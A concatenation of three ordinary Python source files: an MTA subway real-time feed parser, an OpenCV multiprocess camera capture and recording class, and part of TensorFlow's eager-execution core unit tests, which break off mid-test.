return math.sqrt((p2[0] - p1[0])**2 + (p2[1] - p1[1])**2)
class MtaSanitizer(object):
_LOCK_TIMEOUT = 300
_tz = timezone('US/Eastern')
def __init__(self, key, stations_file, expires_seconds=None, max_trains=10, max_minutes=30, threaded=False):
self._KEY = key
self._MAX_TRAINS = max_trains
self._MAX_MINUTES = max_minutes
self._EXPIRES_SECONDS = expires_seconds
self._THREADED = threaded
self._stations = []
self._stops = {}
self._routes = {}
self._read_lock = threading.RLock()
self._update_lock = threading.Lock()
self.logger = logging.getLogger(__name__)
# initialize the stations database
try:
with open(stations_file, 'rb') as f:
self._stations = json.load(f)
for idx, station in enumerate(self._stations):
station['id'] = idx
except IOError as e:
print 'Couldn\'t load stations file '+stations_file
exit()
self._update()
if self._THREADED:
self._start_timer()
def _start_timer(self):
self.logger.info('Starting update thread...')
self._timer_thread = threading.Thread(target=self._update_timer)
self._timer_thread.daemon = True
self._timer_thread.start()
def _update_timer(self):
while True:
time.sleep(self._EXPIRES_SECONDS)
self._update_thread = threading.Thread(target=self._update)
self._update_thread.start()
@staticmethod
def _build_stops_index(stations):
stops = {}
for station in stations:
for stop_id in station['stops'].keys():
stops[stop_id] = station
return stops
def _update(self):
if not self._update_lock.acquire(False):
self.logger.info('Update locked!')
lock_age = datetime.datetime.now() - self._update_lock_time
if lock_age.total_seconds() > self._LOCK_TIMEOUT:
self._update_lock = threading.Lock()
self.logger.info('Cleared expired update lock')
return
self._update_lock_time = datetime.datetime.now()
self.logger.info('updating...')
# create working copy for thread safety
stations = copy.deepcopy(self._stations)
# clear old times
for station in stations:
station['N'] = []
station['S'] = []
station['routes'] = set()
stops = MtaSanitizer._build_stops_index(stations)
routes = {}
feed_urls = [
'http://datamine.mta.info/mta_esi.php?feed_id=1&key='+self._KEY,
'http://datamine.mta.info/mta_esi.php?feed_id=2&key='+self._KEY
]
for i, feed_url in enumerate(feed_urls):
mta_data = gtfs_realtime_pb2.FeedMessage()
try:
with contextlib.closing(urllib2.urlopen(feed_url)) as r:
data = r.read()
mta_data.ParseFromString(data)
except (urllib2.URLError, google.protobuf.message.DecodeError) as e:
self.logger.error('Couldn\'t connect to MTA server: ' + str(e))
self._update_lock.release()
return
self._last_update = datetime.datetime.fromtimestamp(mta_data.header.timestamp, self._tz)
self._MAX_TIME = self._last_update + datetime.timedelta(minutes = self._MAX_MINUTES)
for entity in mta_data.entity:
if entity.trip_update:
for update in entity.trip_update.stop_time_update:
time = update.arrival.time
if time == 0:
time = update.departure.time
time = datetime.datetime.fromtimestamp(time, self._tz)
if time < self._last_update or time > self._MAX_TIME:
continue
route_id = entity.trip_update.trip.route_id
if route_id == 'GS':
route_id = 'S'
stop_id = str(update.stop_id[:3])
station = stops[stop_id]
direction = update.stop_id[3]
station[direction].append({
'route': route_id,
'time': time
})
station['routes'].add(route_id)
try:
routes[route_id].add(stop_id)
                        except KeyError:
                            routes[route_id] = set([stop_id])
# sort by time
for station in stations:
if station['S'] or station['N']:
station['hasData'] = True
station['S'] = sorted(station['S'], key=itemgetter('time'))[:self._MAX_TRAINS]
station['N'] = sorted(station['N'], key=itemgetter('time'))[:self._MAX_TRAINS]
else:
station['hasData'] = False
with self._read_lock:
self._stops = stops
self._routes = routes
self._stations = stations
self._update_lock.release()
def last_update(self):
return self._last_update
def get_by_point(self, point, limit=5):
if self.is_expired():
            self._update()
with self._read_lock:
sortable_stations = copy.deepcopy(self._stations)
sortable_stations.sort(key=lambda x: distance(x['location'], point))
return sortable_stations[:limit]
def get_routes(self):
return self._routes.keys()
def get_by_route(self, route):
if self.is_expired():
            self._update()
with self._read_lock:
out = [ self._stops[k] for k in self._routes[route] ]
out.sort(key=lambda x: x['name'])
return out
def get_by_id(self, ids):
if self.is_expired():
            self._update()
with self._read_lock:
out = [ self._stations[k] for k in ids ]
return out
def is_expired(self):
if self._THREADED:
# check that the update thread is still running
if not self._timer_thread.is_alive():
self._start_timer()
return False
elif self._EXPIRES_SECONDS:
age = datetime.datetime.now(self._tz) - self._last_update
return age.total_seconds() > self._EXPIRES_SECONDS
else:
return False
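# --- Usage sketch (not part of the original module) ---
# A minimal, hedged example of driving MtaSanitizer from a script; the API key
# and the stations.json path below are hypothetical placeholders, not values
# shipped with this code.
if __name__ == '__main__':
    logging.basicConfig(level=logging.INFO)
    feed = MtaSanitizer(key='YOUR_MTA_API_KEY',         # hypothetical key
                        stations_file='stations.json',  # hypothetical stations database
                        expires_seconds=60)
    print feed.get_routes()
    # Three closest stations to a (lat, lon) point, with their upcoming trains.
    for station in feed.get_by_point((40.7527, -73.9772), limit=3):
        print station['name'], sorted(station['routes'])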
|
camera_stream.py
|
import cv2
import os
import time
from multiprocessing import Process,Queue
from tools import Drawing,DrawStatus,Bboxes2JSON
class CameraStream:
def __init__(self,camera_idx,video_hw=[512,512],show=False,save_dir=""):
self._camera_idx=camera_idx
self._video_hw=video_hw
self._show_bool=show
self._save_dir=save_dir
self._self2process_queue=Queue()
self._process2self_queue=Queue()
self._stopsignal_queue=Queue()
self._process=self._InitProcess()
def _InitProcess(self):
init_dict={}
init_dict["CAMERA_IDX"]=self._camera_idx
init_dict["VIDEO_HW"]=self._video_hw
init_dict["SHOW_BOOL"]=self._show_bool
init_dict["SAVE_DIR"]=self._save_dir
self._self2process_queue.put(init_dict)
process=Process(target=self._FrameStream,args=(self._self2process_queue,self._process2self_queue,self._stopsignal_queue))
return process
def _FrameStream(self,self2process_queue,process2self_queue,stopsignal_queue):
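        # Runs in the spawned child process: it owns the camera, mirrors the latest
        # frame back to the parent via process2self_queue, and optionally shows,
        # records and annotates frames with bboxes received on self2process_queue.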
def _InitCurSaveDir(cur_save_dir):
if(os.path.exists(cur_save_dir)==False):
os.mkdir(cur_save_dir)
if(os.path.exists(cur_save_dir+"/img")==False):
os.mkdir(cur_save_dir+"/img")
else:
all_files=os.listdir(cur_save_dir+"/img")
for _file in all_files:
file_path=cur_save_dir+"/img/"+_file
if(os.path.isfile(file_path)==True):
os.remove(file_path)
if(os.path.exists(cur_save_dir+"/json")==False):
os.mkdir(cur_save_dir+"/json")
else:
all_files=os.listdir(cur_save_dir+"/json")
for _file in all_files:
file_path=cur_save_dir+"/json/"+_file
if(os.path.isfile(file_path)==True):
os.remove(file_path)
init_dict=self2process_queue.get()
camera_idx=init_dict["CAMERA_IDX"]
video_hw=init_dict["VIDEO_HW"]
show_bool=init_dict["SHOW_BOOL"]
save_dir=init_dict.get("SAVE_DIR","")
cur_bboxes=None
camera_capture=cv2.VideoCapture(camera_idx)
if not camera_capture.isOpened():
raise Exception("CameraStream _FrameStream Error: Cannot open camera.")
camera_capture.set(cv2.CAP_PROP_FRAME_WIDTH,video_hw[1])
camera_capture.set(cv2.CAP_PROP_FRAME_HEIGHT,video_hw[0])
data_dict={}
recording_bool=False
recording_count=0
frame_count=0
cur_save_dir=None
while(1):
if(stopsignal_queue.empty()==False):
signal_dict=stopsignal_queue.get()
if(signal_dict.get("STOP_SIGNAL",False)==True):
stopsignal_queue.put({"STOP_SIGNAL":True})
break
            ret,frame=camera_capture.read()
            if(ret==False):
                # Camera read failed (device unplugged or end of stream); leave the loop.
                break
            show_frame=frame.copy()
while not process2self_queue.empty():
process2self_queue.get()
process2self_queue.put({"FRAME":frame})
if(show_bool==True):
if(recording_bool==True):
show_frame=DrawStatus(show_frame,status_str="Recording",bgr=(0,255,0))
cv2.imwrite(cur_save_dir+"/img/"+str(frame_count)+".jpg",frame)
else:
show_frame=DrawStatus(show_frame,status_str="Not Recording",bgr=(0,0,255))
if(self2process_queue.empty()==False):
data_dict=self2process_queue.get()
bboxes=data_dict.get("BBOXES",None)
if(type(bboxes)!=type(None)):
cur_bboxes=bboxes
if(recording_bool==True):Bboxes2JSON(bboxes,cur_save_dir+"/json/"+str(frame_count)+".json")
bboxes=None
if(type(cur_bboxes)!=type(None)):
show_frame=Drawing(show_frame,cur_bboxes,thickness=1)
cv2.imshow('DEMO',show_frame)
key_type=cv2.waitKey(1)
if(key_type==ord("q")):
stopsignal_queue.put({"STOP_SIGNAL":True})
break
elif(key_type==ord('r')):
if(recording_bool==False):
cur_save_dir=save_dir+"/"+str(recording_count)
_InitCurSaveDir(cur_save_dir)
frame_count=0
recording_count+=1
recording_bool=True
elif(key_type==ord('c')):
if(recording_bool==True):
recording_bool=False
frame_count+=1
time.sleep(0.001)
if(show_bool==True):cv2.destroyAllWindows()
camera_capture.release()
return
def Start(self):
self._process.start()
self.GetFrame()
return
    def Stop(self):
        # Ask the child to exit cleanly (so it releases the camera), then force-kill
        # it only if it has not finished within a few seconds.
        self._stopsignal_queue.put({"STOP_SIGNAL":True})
        self._process.join(timeout=5)
        if(self._process.is_alive()==True):
            self._process.terminate()
            self._process.join()
        return
def StopChecking(self):
if(self._stopsignal_queue.empty()==True):
return False
else:
signal_dict=self._stopsignal_queue.get()
return signal_dict.get("STOP_SIGNAL",False)
def GetFrame(self):
frame=self._process2self_queue.get()["FRAME"]
self._process2self_queue.put({"FRAME":frame})
return frame
def UpdateBboxes(self,bboxes):
self._self2process_queue.put({"BBOXES":bboxes})
return
def IsAlive(self):
return self._process.is_alive()
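# --- Usage sketch (not part of the original module) ---
# A minimal, hedged example of running the capture process from a main script.
# Camera index 0 and the ./records directory are assumptions for illustration;
# the save directory must already exist, since the child only creates
# per-recording subfolders inside it.
if __name__=="__main__":
    stream=CameraStream(camera_idx=0,video_hw=[512,512],show=True,save_dir="./records")
    stream.Start()
    while(stream.IsAlive()==True and stream.StopChecking()==False):
        frame=stream.GetFrame()
        # A detector would run on `frame` here; feed its boxes back so the child
        # process can draw them and save them alongside recorded frames:
        # stream.UpdateBboxes(bboxes)
        time.sleep(0.03)
    stream.Stop()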
|
core_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for core."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import pickle
import threading
import numpy as np
from tensorflow.core.protobuf import config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.compat import compat
from tensorflow.python.eager import context
from tensorflow.python.eager import core
from tensorflow.python.eager import def_function
from tensorflow.python.eager import execute as execute_lib
from tensorflow.python.eager import executor
from tensorflow.python.eager import test
from tensorflow.python.framework import config
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_resource_variable_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import variables
def execute(op_name, num_outputs, inputs, attrs=None):
return execute_lib.execute(
op_name, num_outputs, inputs, attrs, context.context())
def truncated_normal(shape):
return execute(
b'TruncatedNormal',
1,
inputs=[shape],
attrs=('dtype', dtypes.float32.as_datatype_enum, 'T',
shape.dtype.as_datatype_enum, 'seed', 0, 'seed2', 0))[0]
def current_device():
return constant_op.constant(1.).device
def configure_virtual_cpus():
cpus = config.list_physical_devices('CPU')
# Set 2 virtual CPUs
config.set_virtual_device_configuration(cpus[0], [
context.VirtualDeviceConfiguration(),
context.VirtualDeviceConfiguration()
])
class TFETest(test_util.TensorFlowTestCase):
def setUp(self):
super(TFETest, self).setUp()
configure_virtual_cpus()
def _test_hashable(self, a, b, hashable):
if hashable:
self.assertIsInstance(b, collections.Hashable)
self.assertLen(set([a, b]), 2)
else:
# TODO(gjn): Figure out how to make this work for tf.Tensor
# self.assertNotIsInstance(b, collections.Hashable)
with self.assertRaisesRegexp(TypeError, 'unhashable'):
set([a, b])
def testEquality(self):
default = ops.Tensor._USE_EQUALITY
try:
def _v1_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, 1.0)
self.assertIsNot(a, 1.0)
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
def _v2_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertEqual(a, 1.0)
self.assertIsNot(a, 1.0)
self.assertEqual(a, b)
self.assertIsNot(a, b)
constant_a = constant_op.constant(1.0)
constant_b = constant_op.constant(1.0)
ops.disable_tensor_equality()
self._test_hashable(constant_a, constant_b, True)
_v1_check(constant_a, constant_b)
ops.enable_tensor_equality()
_v2_check(constant_a, constant_b)
self._test_hashable(constant_a, constant_b, False)
variable_a = variables.Variable(1.0)
variable_b = variables.Variable(1.0)
ops.disable_tensor_equality()
_v1_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, True)
ops.enable_tensor_equality()
_v2_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, False)
# We only test numpy behaviour in v2 mode since we'd like to match that.
numpy_a = np.array(1.0)
numpy_b = np.array(1.0)
_v2_check(numpy_a, numpy_b)
self._test_hashable(numpy_a, numpy_b, False)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testEqualityNan(self):
default = ops.Tensor._USE_EQUALITY
try:
def _v1_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, float('nan'))
self.assertIsNot(a, float('nan'))
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
def _v2_check(a, b):
self.assertNotEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, float('nan'))
self.assertIsNot(a, float('nan'))
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
constant_a = constant_op.constant(float('nan'))
constant_b = constant_op.constant(float('nan'))
ops.disable_tensor_equality()
self._test_hashable(constant_a, constant_b, True)
_v1_check(constant_a, constant_b)
ops.enable_tensor_equality()
_v2_check(constant_a, constant_b)
self._test_hashable(constant_a, constant_b, False)
variable_a = variables.Variable(float('nan'))
variable_b = variables.Variable(float('nan'))
ops.disable_tensor_equality()
_v1_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, True)
ops.enable_tensor_equality()
_v2_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, False)
numpy_a = np.array(float('nan'))
numpy_b = np.array(float('nan'))
_v2_check(numpy_a, numpy_b)
self._test_hashable(numpy_a, numpy_b, False)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testEqualityCompare(self):
default = ops.Tensor._USE_EQUALITY
try:
tf_a = constant_op.constant([1, 2])
tf_b = constant_op.constant([1, 2])
tf_c = constant_op.constant([1, 1])
np_a = np.array([1, 2])
np_b = np.array([1, 2])
np_c = np.array([1, 1])
ops.disable_tensor_equality()
# We don't do element-wise comparison
self.assertNotEqual(tf_a, tf_b)
self.assertNotEqual(tf_a, tf_c)
# We can compare list of tensors
self.assertEqual([tf_a, tf_b], [tf_a, tf_b])
self.assertNotEqual([tf_a, tf_b], [tf_b, tf_b])
# We can compare existence in a list
self.assertIn(tf_a, [tf_a, tf_b])
self.assertIn(tf_a, [tf_b, tf_a])
self.assertNotIn(tf_a, [tf_b, tf_c])
ops.enable_tensor_equality()
# We do element-wise comparison but can't convert results array to bool
with self.assertRaises(ValueError):
bool(tf_a == tf_b)
self.assertAllEqual(tf_a == tf_b, [True, True])
with self.assertRaises(ValueError):
bool(tf_a == tf_c)
self.assertAllEqual(tf_a == tf_c, [True, False])
self.assertNotAllEqual(tf_a, tf_c)
with self.assertRaises(ValueError):
bool(np_a == np_b)
self.assertAllEqual(np_a == np_b, [True, True])
with self.assertRaises(ValueError):
bool(np_a == np_c)
self.assertAllEqual(np_a == np_c, [True, False])
self.assertNotAllEqual(np_a, np_c)
# Warning even though we technically shouldn't be able to compare here,
# since the id is the same both TF & numpy will handle lists with the same
# value without raising an error
self.assertEqual([tf_a, tf_b], [tf_a, tf_b])
with self.assertRaises(ValueError):
bool([tf_a, tf_b] == [tf_b, tf_b])
self.assertEqual([np_a, np_b], [np_a, np_b])
with self.assertRaises(ValueError):
bool([np_a, np_b] == [np_b, np_b])
# Similar to lists we shouldn't be able to do a `in` check such as
# `if a in [a,b]`. However if `a` is the first element, it works due to
# short circuiting
self.assertIn(tf_a, [tf_a, tf_b])
with self.assertRaises(ValueError):
bool(tf_a in [tf_b, tf_a])
with self.assertRaises(ValueError):
bool(tf_a in [tf_b, tf_c])
self.assertIn(np_a, [np_a, np_b])
with self.assertRaises(ValueError):
bool(np_a in [np_b, np_a])
with self.assertRaises(ValueError):
bool(np_a in [np_b, np_c])
# rank 0
self.assertAllEqual(
constant_op.constant(1) == constant_op.constant(1), True)
self.assertAllEqual(
constant_op.constant(1) == constant_op.constant(2), False)
self.assertAllEqual(np.array(1) == np.array(1), True)
self.assertAllEqual(np.array(1) == np.array(2), False)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testEqualityBroadcast(self):
default = ops.Tensor._USE_EQUALITY
try:
tf_a = constant_op.constant([1, 1])
tf_b = constant_op.constant([1, 1])
tf_c = constant_op.constant([[1, 1], [1, 1]])
tf_d = constant_op.constant([[1, 2], [1, 2]])
tf_e = constant_op.constant([1, 1, 1])
np_a = np.array([1, 1])
np_b = np.array([1, 1])
np_c = np.array([[1, 1], [1, 1]])
np_d = np.array([[1, 2], [1, 2]])
np_e = np.array([1, 1, 1])
ops.disable_tensor_equality()
# We don't do element-wise comparison
self.assertNotEqual(tf_a, tf_b)
self.assertNotEqual(tf_a, tf_c)
self.assertNotEqual(tf_a, tf_d)
ops.enable_tensor_equality()
# We do element-wise comparison but can't convert results array to bool
with self.assertRaises(ValueError):
bool(tf_a == tf_b)
self.assertAllEqual(tf_a == tf_b, [True, True])
with self.assertRaises(ValueError):
bool(tf_a == tf_c)
self.assertAllEqual(tf_a == tf_c, [[True, True], [True, True]])
with self.assertRaises(ValueError):
bool(tf_a == tf_d)
self.assertAllEqual(tf_a == tf_d, [[True, False], [True, False]])
if compat.forward_compatible(2019, 9, 25):
self.assertFalse(bool(tf_a == tf_e))
self.assertTrue(bool(tf_a != tf_e))
self.assertNotAllEqual(tf_a, tf_e)
else:
with self.assertRaises(errors.InvalidArgumentError):
bool(tf_a != tf_e)
with self.assertRaises(ValueError):
bool(np_a == np_b)
self.assertAllEqual(np_a == np_b, [True, True])
with self.assertRaises(ValueError):
bool(np_a == np_c)
self.assertAllEqual(np_a == np_c, [[True, True], [True, True]])
self.assertAllEqual(np_a == np_d, [[True, False], [True, False]])
self.assertFalse(bool(np_a == np_e))
self.assertTrue(bool(np_a != np_e))
self.assertNotAllEqual(np_a, np_e)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testContext(self):
ctx = context.Context()
self.assertTrue(ctx.executing_eagerly())
self.assertEqual('', ctx.scope_name)
ctx.scope_name = 'foo'
self.assertEqual('foo', ctx.scope_name)
self.assertEqual(context.SYNC, ctx.execution_mode)
ctx.execution_mode = context.ASYNC
self.assertEqual(context.ASYNC, ctx.execution_mode)
ctx.execution_mode = context.SYNC
self.assertEqual(context.SYNC, ctx.execution_mode)
self.assertEqual('', ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device('GPU:0'):
self.assertEqual('/job:localhost/replica:0/task:0/device:GPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device(None):
self.assertEqual('', ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device('CPU:0'):
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device(ctx.list_logical_devices('CPU')[0]):
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
gpus = ctx.list_logical_devices('GPU')
if gpus:
with ctx.device(gpus[0]):
self.assertEqual('/job:localhost/replica:0/task:0/device:GPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
has_cpu_device = False
for x in ctx.devices():
has_cpu_device = has_cpu_device or 'CPU' in x
self.assertTrue(has_cpu_device)
del ctx
def testDevice_supportsLogicalDevice(self):
ctx = context.Context()
cpus = ctx.list_logical_devices('CPU')
with ctx.device(cpus[0]):
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
ctx.device_name)
def testDevice_supportsDeviceSpec(self):
ctx = context.Context()
device_name = '/job:localhost/replica:0/task:0/device:CPU:0'
device_spec = pydev.DeviceSpec.from_string(device_name)
with ctx.device(device_spec):
self.assertEqual(device_name, ctx.device_name)
def testAsyncBasic(self):
ctx = context.Context(execution_mode=context.ASYNC)
ctx.ensure_initialized()
has_cpu_device = False
for x in ctx.devices():
has_cpu_device = has_cpu_device or 'CPU' in x
self.assertTrue(has_cpu_device)
del ctx
def testMultiCpuPlacement(self):
with ops.device('cpu:1'):
x = constant_op.constant(1.0)
y = array_ops.identity(x)
self.assertEqual(x.device, '/job:localhost/replica:0/task:0/device:CPU:1')
self.assertEqual(y.device, '/job:localhost/replica:0/task:0/device:CPU:0')
@test_util.run_gpu_only
def testShouldCopy(self):
with ops.device('gpu:0'):
x = constant_op.constant(1.0)
y = array_ops.identity(x)
# The value we're testing y.device against will depend on what the behavior
# of not explicitly specifying a device in the context is. This behavior is
# subject to change (for example, in the future we may want to use GPUs, if
# available, when no device is explicitly provided)
self.assertEqual(y.device, '/job:localhost/replica:0/task:0/device:CPU:0')
def testContextSwitchStackContainsEagerMode(self):
# Eager execution has been enabled, and no other context switch has
# occurred, so `context_switches` should contain exactly one entry.
self.assertEqual(len(context.context().context_switches.stack), 1)
switch = context.context().context_switches.stack[0]
# The entry should log that eager mode was entered.
self.assertIs(switch.enter_context_fn, context.eager_mode)
# It is not possible to build a graph function when eager execution
# is enabled; the stack entry should reflect this fact.
self.assertFalse(switch.is_building_function)
@test_util.run_gpu_only
def testInt32GPU(self):
with ops.device('gpu:0'):
xent = nn_ops.sparse_softmax_cross_entropy_with_logits(
logits=[[0.0, 0.0]], labels=[0])
self.assertAllClose(xent, [0.69314718])
def _runInThread(self, target, args):
t = threading.Thread(target=target, args=args)
try:
t.start()
t.join()
except Exception as e:
raise e
# Test that different thread local values are initialized to the same values
# in different threads.
def testContextThreadLocalMembers(self):
def get_context_values(ctx):
return [
ctx.executing_eagerly(),
ctx.scope_name,
ctx.device_name,
ctx.num_gpus()
]
def get_values(ctx, values):
values.extend(get_context_values(ctx))
context_values = []
ctx = context.Context()
self._runInThread(get_values, (ctx, context_values))
self.assertAllEqual(context_values, get_context_values(ctx))
@test_util.run_gpu_only
def testContextConfig(self):
ctx = context.Context(config=config_pb2.ConfigProto(
device_count={'GPU': 0}))
    self.assertEqual(0, ctx.num_gpus())
def testPickle(self):
tmp_dir = self.get_temp_dir()
fname = os.path.join(tmp_dir, 't.pickle')
with open(fname, 'wb') as f:
t = constant_op.constant(10.0)
pickle.dump(t, f)
with open(fname, 'rb') as f:
t = pickle.load(f)
self.assertAllEqual(t.numpy(), 10.0)
@test_util.run_gpu_only
def testDevicePlacementEnforcesConsistency(self):
cpu = context.device('cpu:0')
gpu = context.device('gpu:0')
cpu.__enter__()
self.assertEndsWith(current_device(), 'CPU:0')
gpu.__enter__()
self.assertEndsWith(current_device(), 'GPU:0')
with self.assertRaisesRegexp(
RuntimeError, 'Exiting device scope without proper scope nesting'):
cpu.__exit__()
self.assertEndsWith(current_device(), 'GPU:0')
gpu.__exit__()
self.assertEndsWith(current_device(), 'CPU:0')
@test_util.run_gpu_only
def testReEntrant(self):
cpu = context.device('cpu:0')
gpu = context.device('gpu:0')
with cpu:
with gpu:
with gpu:
self.assertEndsWith(current_device(), 'GPU:0')
self.assertEndsWith(current_device(), 'GPU:0')
self.assertEndsWith(current_device(), 'CPU:0')
with gpu:
self.assertEndsWith(current_device(), 'GPU:0')
@test_util.run_gpu_only
def testTensorPlacement(self):
x = constant_op.constant(1.).gpu()
with context.device('gpu:0'):
y = constant_op.constant(2.)
# Add would fail if t2 were not on GPU
result = execute(
b'Add', 1, inputs=[x, y],
attrs=('T', x.dtype.as_datatype_enum))[0].cpu().numpy()
self.assertEqual(3, result)
@test_util.run_gpu_only
def testResourceTensorPlacement(self):
with context.device('gpu:0'):
v = resource_variable_ops.ResourceVariable(1.0)
with context.device('cpu:0'):
# Check that even though we specified the cpu device we'll run the read op
# in the device where the handle is.
self.assertAllEqual(
gen_resource_variable_ops.read_variable_op(v.handle, v.dtype), 1.0)
@test_util.run_gpu_only
def testCopyBetweenDevices(self):
x = constant_op.constant([[1., 2.], [3., 4.]])
x = x.cpu()
x = x.gpu()
x = x.gpu()
x = x.cpu()
# Invalid device
with self.assertRaises(RuntimeError):
x.gpu(context.context().num_gpus() + 1)
@test_util.run_gpu_only
def testCopyBetweenDevicesAsync(self):
with context.execution_mode(context.ASYNC):
x = constant_op.constant([[1., 2.], [3., 4.]])
x = x.cpu()
x = x.gpu()
x = x.gpu()
x = x.cpu()
context.context().executor.wait()
# Invalid device
with self.assertRaises(RuntimeError):
x.gpu(context.context().num_gpus() + 1)
context.context().executor.wait()
context.context().executor.clear_error()
@test_util.run_gpu_only
def testCopyScope(self):
constant = constant_op.constant(1.0)
with ops.device('gpu:0'):
with context.device_policy(context.DEVICE_PLACEMENT_SILENT):
c = constant + 1.0
self.assertAllEqual(c, 2.0)
def testPyFunctionNullContext(self):
def simple_fn(unused_handle):
return 1.
@def_function.function
def test_fn(v):
script_ops.eager_py_func(simple_fn, [v.handle], dtypes.float32)
return 1.
test_var = variables.Variable([2., 3.])
self.assertAllEqual(test_fn(test_var), 1.0)
def testPyFunctionAsync(self):
def simple_fn(v):
one = constant_op.constant(1.)
return v + one
@def_function.function
def test_fn(v):
return script_ops.eager_py_func(simple_fn, [v], dtypes.float32)
async_executor = executor.new_executor(enable_async=True)
with context.executor_scope(async_executor):
test_var = variables.Variable(2.)
self.assertAllEqual(test_fn(test_var), 3.0)
async_executor.wait()
@test_util.run_gpu_only
def testNumpyForceCPU(self):
cpu = constant_op.constant([[1., 2.], [3., 4.]])
c2g = cpu.gpu()
self.assertAllEqual(c2g, cpu.numpy())
def testCopyFromCPUToCPU(self):
ta = constant_op.constant([[1, 2], [3, 4]])
tb = ta.cpu()
self.assertNotEqual(id(ta), id(tb))
self.assertAllEqual(ta, tb.numpy())
def testRegisterExceptionClass(self):
with self.assertRaises(TypeError):
pywrap_tensorflow.TFE_Py_RegisterExceptionClass(str)
pywrap_tensorflow.TFE_Py_RegisterExceptionClass(core._NotOkStatusException) # pylint: disable=protected-access
# TODO(agarwal): add tests passing incorrect typed values to attrs.
def testExecuteBasic(self):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = execute(
b'Mul',
num_outputs=1,
inputs=[three, five],
attrs=('T', three.dtype.as_datatype_enum))[0]
self.assertAllEqual(15, product)
def testExecuteBasicAsync(self):
with context.execution_mode(context.ASYNC):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = execute(
b'Mul',
num_outputs=1,
inputs=[three, five],
attrs=('T', three.dtype.as_datatype_enum))[0]
self.assertAllEqual(15, product)
# Error: Invalid arguments
context.set_execution_mode(context.ASYNC)
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'MatMul',
num_outputs=1,
inputs=[three, five],
attrs=('transpose_a', False, 'transpose_b', False, 'T',
three.dtype.as_datatype_enum))
context.context().executor.wait()
context.context().executor.clear_error()
context.context().execution_mode = context.SYNC
def testExecuteTooManyNumOutputs(self):
# num_outputs provided is 50, but only one output is produced.
product = execute(
b'Mul',
num_outputs=50,
inputs=[constant_op.constant(3),
constant_op.constant(5)],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
self.assertAllEqual(15, product)
def testExecuteTooFewNumOutputs(self):
# num_outputs provided is 0, but one output is produced.
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'Mul',
num_outputs=0,
inputs=[constant_op.constant(3),
constant_op.constant(5)],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
@test_util.run_gpu_only
def testMatMulGPU(self):
three = constant_op.constant([[3.]]).gpu()
five = constant_op.constant([[5.]]).gpu()
product = execute(
b'MatMul',
num_outputs=1,
inputs=[three, five],
attrs=('transpose_a', False, 'transpose_b', False, 'T',
three.dtype.as_datatype_enum))[0]
self.assertAllEqual([[15.0]], product)
def testExecuteStringAttr(self):
checked_three = execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 'just checking', 'T',
dtypes.float32.as_datatype_enum))[0]
self.assertEqual([[3]], checked_three.numpy())
def testExecuteStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 1, 'T', dtypes.float32.as_datatype_enum))
def testExecuteFloatAttr(self):
almost_equal = execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', 0.3, 'T', dtypes.float32.as_datatype_enum))[0]
self.assertTrue(almost_equal)
def testExecuteFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', '0.3', 'T', dtypes.float32.as_datatype_enum))
def testExecuteIntAttr(self):
total = execute(
b'AddN',
num_outputs=1,
